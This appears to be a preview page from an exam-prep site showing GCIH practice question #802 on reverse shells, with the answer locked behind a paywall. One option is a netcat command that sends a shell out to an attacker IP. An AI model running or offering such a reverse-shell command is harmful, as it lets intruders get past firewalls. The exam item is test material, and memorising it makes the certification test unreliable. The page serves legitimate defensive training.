GIAC
GCIH · Question #802
GCIH Question #802: Real Exam Question with Answer & Explanation
Sign in or unlock GCIH to reveal the answer and full explanation for question #802. The question stem and answer options stay visible for context.
Vulnerability Exploitation & Privilege Escalation
Question
An attacker at IP address 11.22.33.44 set up a reverse shell so he could execute commands on a server (internal IP address 192.168.20.21) that sits behind a site firewall blocking incoming SSH traffic but allowing all outbound traffic. What command would he run on the server?
Options
- Atcpdump -nn port 22 and host 11.22.33.44
- Bssh -b 192.168.20.21 -p 22 11.22.33.44
- Cnc 11.22.33.44 22 -e /bin/sh
- Dlsof -i @192.168.20.21:22
Unlock GCIH to see the answer
You've previewed enough free GCIH questions. Unlock GCIH for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.
Topics
#reverse shell#netcat#firewall bypass#outbound tunneling